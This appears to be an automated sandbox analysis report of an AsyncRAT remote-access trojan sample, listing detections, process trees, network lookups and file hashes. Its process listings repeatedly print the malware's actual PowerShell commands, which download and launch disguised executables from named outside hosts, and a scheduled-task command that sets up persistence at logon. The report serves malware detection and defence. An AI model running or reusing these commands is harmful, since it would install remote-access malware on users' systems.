Analysis Overview
SHA256
16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
Threat Level: Known bad
The file 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe was found to be: Known bad.
Malicious Activity Summary
Asyncrat family
Async RAT payload
AsyncRat
Executes dropped EXE
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious use of SetWindowsHookEx
Delays execution with timeout.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-18 07:12
Signatures
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Asyncrat family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-18 07:12
Reported
2024-04-18 07:15
Platform
win10v2004-20240412-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe
"C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7E67.tmp.bat""
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
C:\Users\Admin\AppData\Roaming\system.exe
"C:\Users\Admin\AppData\Roaming\system.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xcu.exgaming.click | udp |
| US | 8.8.8.8:53 | xcu5.exgaming.click | udp |
| US | 8.8.8.8:53 | 163.233.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xcu.exgaming.click | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xcu5.exgaming.click | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 52.111.229.43:443 | | tcp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0njy1pvn.3ai.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e9c5f9e7437285aa87e4433bc7e0f9d7 |
| SHA1 | 2363ddac1155a065a54dc6a0fc307d86bd88246b |
| SHA256 | 0cb341e3c6fd873cf50bd24821761efdaec49406557f21db3f1a4ee68796b520 |
| SHA512 | 7cc866c84540c274e013a0eb453e89a27a52a410923ee28488f9b88d6fd8dad77c6e7e99e1cf97dc6202233a7d093e89bfc22eae3102d50cd83207d98b2f3cb2 |
C:\Users\Admin\AppData\Local\Temp\tmp7E67.tmp.bat
| MD5 | de534067b6262e543715278e864405e1 |
| SHA1 | f574aedf1af8dd559e13c49b74e436a8c7371f60 |
| SHA256 | 1d4dd497712d484440da7f1de1ccd15364c40fcc6b349fd3aa158a8397d93573 |
| SHA512 | 8e9a0325f585e8a9ac01c26c78b29360bf43fa1a840249955aab865fe6fdca63885b7b584c53fa161b6f7c28e0c650fa1dd92e2c5d214e4b655717c1b56bd6e5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e623e3603f24dc9b8549f420fe3c5aef |
| SHA1 | 782f48ac54014c8e165fc1f5c78bd128b7c9c640 |
| SHA256 | e40be6528731018eef4c05c5037d3164d87e33fb4d592d85de03cf71bb1980f7 |
| SHA512 | 31f83dd471749e343f8ee21912f1aca206499ba415a9bfb6f1d14fe738d74d92deba452a6f76a14a830a5f6c4462c45e51622d50e87e0d59165a00d53a79a225 |
C:\Users\Admin\AppData\Roaming\system.exe
| MD5 | a7d63348cfe9b0dc9d3aaec28c76c8f0 |
| SHA1 | 1b993f554960286e90cfd7cedf4c457e1c46ff80 |
| SHA256 | 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54 |
| SHA512 | 3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010 |
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
| MD5 | cf759e4c5f14fe3eec41b87ed756cea8 |
| SHA1 | c27c796bb3c2fac929359563676f4ba1ffada1f5 |
| SHA256 | c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761 |
| SHA512 | c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b5506533654486099b48ee036f9ef543 |
| SHA1 | 768441bd2eb613df5b4e97d2d840726ca28b07f3 |
| SHA256 | d61f0401e469d696e9b1d27457a7e2682f399e2ca296f77e8743de23e4d9de4b |
| SHA512 | 514c722b0862672c7aa4cfb92243085fe058ea413a6001220008b71884ca8dec273ede232f05494f3a354446fc62e96b2472d476c5ee2f1d8e1e837c2aede9a6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 68f7ed7a9faf5c82f2fc821a97f68087 |
| SHA1 | bb879765b9a0d1130ee1e269eeb617ad7db133d0 |
| SHA256 | 112e64911ce2ebcb7327222eed8b30f516d22dc05167b625a473dec93712e6cb |
| SHA512 | ff1b4735aceb582cd6d0e667794efc3371ce12b8bf23f456e7415ea97b707692bfefe040b963a44699d12a08d4b3f314858621b117e169355dd0e18c7e4a1e9d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 72ce8e6d097c0c934ce5ffde536de571 |
| SHA1 | 296f99fc5f5b8b04e24203ac3d059a72fd0face4 |
| SHA256 | b2c8a41d654533b61deb2e133a6ae2db78bf1a9949d65d405528179895f9aa18 |
| SHA512 | c7ae06d8cf60ba60e493a839d93b739d5c313efb227d3e85e8db124674ca362b0e198d7bdfc197dba37e255de40376237693052ba6f2d78d9219f1ffe9f0d385 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2578b2ca2525a3609fb41ad87f77409f |
| SHA1 | 75f907f5d330620918e5ce8126f73543fc9049f9 |
| SHA256 | 3a0ed5d2741de47a225249afe38f0befa053e44d6f1792f17793188192ddfdf4 |
| SHA512 | 272a28316eddc9360cc22d178a86b817db93848cf353980dccf85b681805a8cae949ae65080d4116baa52fe55c482b1906bcaae2e2fb3bf63ab01b92a1c3f775 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-18 07:12
Reported
2024-04-18 07:15
Platform
win7-20240221-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe
"C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp3727.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
C:\Users\Admin\AppData\Roaming\system.exe
"C:\Users\Admin\AppData\Roaming\system.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | xcu.exgaming.click | udp |
| US | 8.8.8.8:53 | xcu5.exgaming.click | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\tmp3727.tmp.bat
| MD5 | da995218b014b0710cd684f4b17004d7 |
| SHA1 | b2b6678af1b19afc608c6a632be09e975d4d2b75 |
| SHA256 | 58dc26ec3924579de22168382ad4e3b4aeee714df246c668fefb0d2c8536729f |
| SHA512 | b453fdda361d71ef98a2ad3082c7f7ded4912ddc13ac7af912f52f19ff48f567363a824cf4e94511935b34466fb0fe33437e170a407023e58aae3dab202a300e |
C:\Users\Admin\AppData\Roaming\system.exe
| MD5 | a7d63348cfe9b0dc9d3aaec28c76c8f0 |
| SHA1 | 1b993f554960286e90cfd7cedf4c457e1c46ff80 |
| SHA256 | 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54 |
| SHA512 | 3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q125AZ11C0IGZMISVW8E.temp
| MD5 | 5bedae33d43a46d566be309f7a9e8a42 |
| SHA1 | fa909fb005d680661b299930127f20a57dacc4ef |
| SHA256 | b43b8da7e86ade79c51c2318fb1a43e6d440a50ecd7bb4b1b1d6e4246647fe34 |
| SHA512 | 3b98e06f21b1d589cccffd7e546a37c780d22ad58ee2da4e37b39cb798f2555cc1d7281e31a029fe636fdc831edec8e3437f2529c3dfede69a364f9e8a5485ca |
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
| MD5 | cf759e4c5f14fe3eec41b87ed756cea8 |
| SHA1 | c27c796bb3c2fac929359563676f4ba1ffada1f5 |
| SHA256 | c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761 |
| SHA512 | c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b |